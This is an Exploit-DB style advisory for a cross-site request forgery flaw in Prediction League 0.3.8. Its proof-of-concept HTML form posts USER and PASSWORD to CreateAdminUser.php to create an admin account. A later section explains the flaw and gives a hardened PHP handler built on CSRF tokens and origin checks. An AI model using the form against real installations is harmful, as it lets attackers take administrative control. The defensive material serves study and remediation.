Prediction League 0.3.8 – Cross-Site Request Forgery (Add Admin)

Author: indoushka
Date: 2010-04-04
Category:
Platform:
Source: https://www.exploit-db.com/exploits/12043/
========================================================================================
| # Title: Prediction League 0.3.8 CSRF Create Admin User Exploit
| # Author : indoushka
| # Home : www.iqs3cur1ty.com/vb
| # Tested on: Linux Français v.(9.4 Ubuntu)
| # Bug: CSRF Create Admin User Exploit
======================Exploit By indoushka =================================
# Exploit:

<form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php">
<table>
<tr>
<td class="TBLHEAD" colspan="3" align="CENTER">
<font class="TBLHEAD">
Admin User Administration
</font>
</td>
</tr>
<tr>
<td class="TBLROW">
<font class="TBLROW">
Admin User Name
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
<input type="TEXT" size="20" name="USER" value="">
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
The name for the admin user.
</font>
</td>
</tr>
<tr>
<td class="TBLROW">
<font class="TBLROW">
Password
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
<input type="TEXT" size="20" name="PASSWORD">
</font>
</td>
<td class="TBLROW">
<font class="TBLROW">
The password for the admin user.
</font>
</td>
</tr>
<tr>
<td colspan="3" class="TBLROW" align="CENTER">
<input type="SUBMIT" NAME="CREATE" VALUE="CREATE">
</td>
</tr>
</table>
</form>
<?php
}
?>

</body>
</html>
    
    
2 - Save As .html

3 - Login
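The form above works because CreateAdminUser.php accepts any POST that carries USER and PASSWORD: the victim's browser attaches the logged-in admin's session cookie automatically, and nothing ties the request to a page the application itself served. The fix on the server side is a per-session synchronizer token that the attacker's page cannot read, backed by an Origin/Referer check. The handler below is an added example written for this page, not Prediction League's own code; the function names, the ALLOWED_ORIGIN value, the CSRF_TOKEN field name and the create_admin_user() persistence call are all assumptions for illustration.

```php
<?php
// Added example, not Prediction League code. A CSRF-resistant version of an
// admin-creation handler. ALLOWED_ORIGIN, CSRF_TOKEN and create_admin_user()
// are assumed names for illustration.
declare(strict_types=1);

session_start();

const ALLOWED_ORIGIN = 'https://predictionleague.example'; // constructed value

// Issue one random synchronizer token per session. Call this when rendering
// the legitimate admin form; the attacker's page cannot read it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in the real form next to USER and PASSWORD.
function csrf_hidden_field(): string
{
    return '<input type="hidden" name="CSRF_TOKEN" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Compare the submitted token with the session token in constant time.
function csrf_token_is_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Second layer: the request must claim our own origin. Origin is preferred;
// Referer is used as a fallback. A browser form POST normally carries at least
// one of them, so absence of both is treated as untrusted.
function origin_is_allowed(array $headers): bool
{
    $origin = $headers['Origin'] ?? null;
    if ($origin === null && isset($headers['Referer'])) {
        $p = parse_url($headers['Referer']);
        if ($p !== false && isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host']
                    . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    return $origin !== null && strcasecmp($origin, ALLOWED_ORIGIN) === 0;
}

// Hardened handler. The vulnerable pattern creates the account as soon as
// USER and PASSWORD are present; being logged in (step 3 above) does not
// help, because the victim's browser supplies the session cookie for free.
function handle_create_admin(array $server, array $post, array $headers): array
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return ['status' => 405, 'error' => 'method not allowed'];
    }
    if (empty($_SESSION['admin_id'])) {
        return ['status' => 403, 'error' => 'not authenticated'];
    }
    if (!origin_is_allowed($headers)) {
        return ['status' => 403, 'error' => 'cross-origin request rejected'];
    }
    if (!csrf_token_is_valid($post['CSRF_TOKEN'] ?? null)) {
        return ['status' => 403, 'error' => 'missing or invalid CSRF token'];
    }
    $user = trim((string)($post['USER'] ?? ''));
    $pass = (string)($post['PASSWORD'] ?? '');
    if ($user === '' || strlen($pass) < 12) {
        return ['status' => 400, 'error' => 'username required, password >= 12 chars'];
    }
    // Store only a password hash, never the plaintext.
    create_admin_user($user, password_hash($pass, PASSWORD_DEFAULT));
    return ['status' => 201, 'error' => null];
}

// Hypothetical persistence call: an INSERT through a prepared statement.
function create_admin_user(string $user, string $hash): void
{
}
```

Against the PoC above, the request fails the origin check (the form is served from the attacker's page, not ALLOWED_ORIGIN) and, independently, the token check (the form has no CSRF_TOKEN field and could not know its value). Marking the session cookie SameSite=Lax or Strict adds a third, browser-enforced layer for cross-site POSTs, but the token remains the primary control because it does not depend on client behaviour.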
     
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friends :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------